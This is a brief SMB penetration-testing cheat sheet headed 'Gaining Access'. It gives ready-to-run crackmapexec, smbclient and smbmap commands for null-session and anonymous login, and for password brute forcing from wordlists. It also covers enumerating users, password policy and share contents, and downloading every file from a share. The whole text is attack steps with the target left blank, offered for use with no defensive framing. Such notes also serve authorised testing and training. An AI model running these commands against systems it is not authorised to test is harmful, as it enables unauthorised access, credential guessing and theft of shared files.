Gaining Access

Test for Null authentication

# Using crackmapexec
crackmapexec smb -u '' -p '' --shares

# Using SmbClient
smbclient -N //

# Using SmbMap
smbmap -u '' -p '' -H

Test for anonymous/guest login

# Using Smbmap
smbmap -u anonymous -p anonymous -H

Password Brute Forcing

crackmapexec smb -u /root/users.lst -p /root/passwords.lst


# Enum users
crackmapexec smb -u '' -p '' --users

# Enum Password Policy
crackmapexec smb -u '' -p '' --pass-pol

# Enum files on share and their creation/modification dates
crackmapexec smb -u '' -p '' -M spider_plus


Download all files from share

# Using smbclient
smbclient -N //
recurse ON
prompt OFF
mget *